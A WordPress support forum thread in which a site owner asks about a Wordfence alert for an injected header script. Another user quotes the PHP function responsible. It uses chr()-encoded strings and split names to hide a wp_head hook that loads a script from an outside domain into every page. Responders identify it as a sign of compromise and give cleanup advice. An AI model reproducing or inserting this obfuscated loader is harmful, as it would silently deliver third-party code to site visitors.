Wordfence detecting critical issue in header

  • Resolved coldxot

    (@coldxot)


    1 year, 9 months ago

    WordPress is detecting a critical issue in my header:

    <script src=’https://cdn.scriptsplatform.com/scripts/header.js&#8217; type=’text/javascript’></script><?php\x0a/*

    But for some reason when I look I do not find this actually in the header when I use the inspect tool on the website. I cannot find any information on this either.

    Is this something to be concerned about?

    Thank you.

Viewing 6 replies - 1 through 6 (of 6 total)

  • I also detected this script in the header. I searched for the string “chr(” in all php files and found a function that uses it.

    function posts_layouts_head(){
	$sc = "sc"."r"."ipt";
	echo "<".$sc." ".substr($sc, 0,3)."='htt".chr(112).chr(115).chr(58).chr(47).chr(47).chr(99).chr(100).chr(110).chr(46).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(115).chr(112).chr(108).chr(97).chr(116).chr(102)."orm.com/scripts/stats.js' type='text/java".$sc."'></".$sc.">";

}
add_action("w"."p_h"."ead",'posts_layouts_head');
    Thread Starter coldxot

    (@coldxot)

    Is this a normal function? It’s odd as I have the same setup on other websites and this is not being flagged anywhere else.

    See also in wp-blog-header.php

    Plugin Support wfjanet

    (@wfjanet)

    Hi @coldxot,

    Thank you for reaching out.

    From the issue description you have provided, I suspect this could be a false positive.

    Could you please expand the details button and share a screenshot of the scan result using snipboard so I can take a look and advise?

    Share the link to the screenshot once done.

    I look forward to hearing from you.

    Thanks,

    Janet

    @wfjanet this may not be a false positive but a sign of website exploitation

    We have responded recently to a cyberincident where this script was found in some of the payloads/changed files

    @coldxot I recommend investigating your website for signs of compromise, e.g. new changes/files or accounts added, vulnerable plugins, etc

    Plugin Support wfjanet

    (@wfjanet)

    Thank you @altersec.

    @coldxot
    You can clean the sites by using the following guide:?https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/?

    Make sure and get all your plugins and themes updated and update WordPress core, too. As a rule, any time I think someone’s site has been compromised, I also tell them to update their passwords for their hosting control panel, FTP, WordPress admin users, and database. Make sure to do this because attack vectors around your hosting or database environments are outside of Wordfence’s influence as an endpoint firewall.

    Additionally, you might find the WordPress Malware Removal section in our Learning Center helpful: https://wordfence.com/learn/ 

    If you’re unable to clean this on your own, there are paid services that will do it for you. Wordfence offers one and there are others. Per the forum rules, we’re not allowed to discuss Premium here, but please reach out to us at presales @ wordfence . com if you have any questions about it.

    Regardless, if you choose to clean it yourself or let someone else do so, we recommend that you make a full backup of the site beforehand.

    Thanks,

    Janet

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Wordfence detecting critical issue in header’ is closed to new replies.